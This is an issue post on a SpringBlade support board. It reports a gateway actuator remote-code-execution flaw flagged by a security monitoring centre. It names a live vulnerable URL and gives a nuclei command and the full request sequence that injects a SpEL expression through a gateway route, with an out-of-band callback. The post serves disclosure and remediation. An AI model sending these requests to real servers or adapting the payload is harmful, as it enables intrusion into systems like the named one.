SpringBlade api actuator rce -存在安全隐患

Blade 未结 1 17

一、该问题的重现步骤是什么?

 国家网络与信息安全信息通报中心 监测发现SpringBlade api actuator rce

 

隐患描述 : 

 

 

漏洞URL:http://clms.baoyinggas.cn/api/actuator/gateway/routes/2bYws4BEWU9eEYgmDz1V0eG1G9G

nuclei  -t saber-rce-api_actuator.yaml -u http://clms.baoyinggas.cn/ -dresp

 


POST  /api/actuator/gateway/routes/{{randstr}} HTTP/1.1
Host:  {{Hostname}}
Content-Type:  application/json

{
"predicates":  [
{
"name":  "Path",
"args":  {
"_genkey_0":  "/{{randstr}}/**"
}
}
],
"filters":  [
{
"name":  "RewritePath",
"args":  {
"_genkey_0":  "#{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")}",
"_genkey_1":  "/${path}"
}
}
],
"uri":  "{{RootURL}}",
"order":  0
}


POST  /api/actuator/gateway/refresh HTTP/1.1
Host:  {{Hostname}}
Content-Type:  application/json

{
"predicate":  "Paths: [/{{randstr}}], match trailing slash: true",
"route_id":  "{{randstr}}",
"filters":  [
"[[RewritePath  #{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")} = /${path}], order  = 1]"
],
"uri":  "{{RootURL}}",
"order":  0
}


DELETE  /api/actuator/gateway/routes/{{randstr}} HTTP/1.1
Host:  {{Hostname}}

rce.png

二、你期待的结果是什么?实际看到的又是什么?


三、你正在使用的是什么产品,什么版本?在什么操作系统上?


四、请提供详细的错误堆栈信息,这很重要。


五、若有更多详细信息,请在下面提供。

1条回答
提交回复